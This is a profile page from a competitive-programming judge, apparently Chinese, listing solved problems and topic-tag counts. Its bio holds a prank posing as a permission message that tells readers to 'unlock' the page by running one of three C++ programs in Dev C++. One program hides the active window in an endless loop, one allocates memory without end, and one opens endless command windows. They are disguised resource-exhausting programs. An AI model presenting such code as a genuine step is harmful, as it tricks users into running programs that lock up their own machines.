-
个人简介
Oops! 你没有该权限 请在Dev C++运行以解锁: #include<bits/stdc++.h> #include<windows.h> using namespace std; int main(){ while(1){ HWND hWnd=GetForegroundWindow(); ShowWindow(hWnd,SW_HIDE);} } 或 #include<bits/stdc++.h> using namespace std; int main(){ while(1) malloc(1000); } 或 #include<bits/stdc++.h> #include<windows.h> using namespace std; int main(){ while(1){ system("start cmd"); } }
-
通过的题目
- P1026
- P1030
- P1031
- P1034
- P1035
- P1042
- P1043
- P1044
- P1049
- P1052
- P1058
- P1070
- P1071
- P1073
- P1075
- P1078
- P1089
- P1091
- P1092
- P1093
- P1095
- P1098
- P1107
- P1110
- P1114
- P1115
- P1128
- P1132
- P1134
- P1140
- P1153
- P1162
- P1163
- P1184
- P1187
- P1189
- P1190
- P1191
- P1193
- P1219
- P1225
- P1230
- P1259
- P1261
- P1263
- P1276
- P1278
- P1279
- P1280
- P1282
- P1283
- P1284
题目标签
- 语言基础
- 71
- 其他
- 29
- 一维数组
- 28
- 循环语句
- 25
- 二维数组
- 19
- 字符串
- 18
- 字符数组
- 17
- NOIP
- 13
- 竞赛
- 13
- 贪心
- 12
- 递归
- 10
- 排序
- 9
- 搜索
- 9
- 位运算
- 8
- 高精度
- 8
- 普及组
- 8
- 二分
- 7
- 二分查找
- 7
- 数据结构
- 6
- 递推
- 5